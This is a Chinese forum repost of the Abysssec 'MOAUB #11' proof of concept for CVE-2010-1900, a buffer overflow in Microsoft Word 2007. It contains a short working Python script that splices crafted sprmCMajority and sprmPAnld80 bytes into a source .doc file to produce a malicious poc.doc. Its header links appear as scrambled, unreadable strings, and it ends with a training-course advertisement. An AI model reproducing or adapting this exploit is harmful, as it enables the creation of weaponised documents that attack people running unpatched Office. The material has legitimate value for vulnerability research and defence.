-
-
[转帖]MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow
-
发表于:
2010-9-11 22:04
4442
-
[转帖]MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
17eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1x3e0q4Q4x3X3c8E0K9h3y4J5L8%4y4G2k6Y4c8Q4x3X3c8G2k6X3k6A6j5$3g2Q4x3X3c8%4L8%4u0V1i4K6u0V1M7%4m8J5L8h3y4E0j5h3A6G2M7X3W2@1P5g2)9J5k6r3u0#2k6X3k6W2M7W2)9J5k6r3!0$3k6i4u0X3L8r3!0%4i4K6u0r3
429K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8Y4y4H3L8r3!0A6N6s2y4Q4x3V1k6E0L8$3q4#2j5W2)9J5k6o6p5I4i4K6u0V1k6i4S2H3L8r3!0A6N6q4)9J5k6i4A6A6M7l9`.`.
'''
'''
Title : Microsoft Office Word sprmCMajority buffer overflow
Version : Word 2007 SP 2
Analysis :
e12K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
Vendor :
426K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8b7`.`.
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1900
'''
import sys
def main():
try:
fdR = open('src.doc', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:4082]
str2 = strTotal[4088:]
sprmCMajority = "\x47\xCA\xFF" # sprmCMajority
sprmPAnld80 = "\x3E\xC6\xFF" # sprmPAnld80
fdW= open('poc.doc', 'wb+')
fdW.write(str1)
fdW.write(sprmCMajority)
fdW.write(sprmPAnld80)
fdW.write(str2)
fdW.close()
fdR.close()
print '[-] Word file generated'
except IOError:
print '
Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
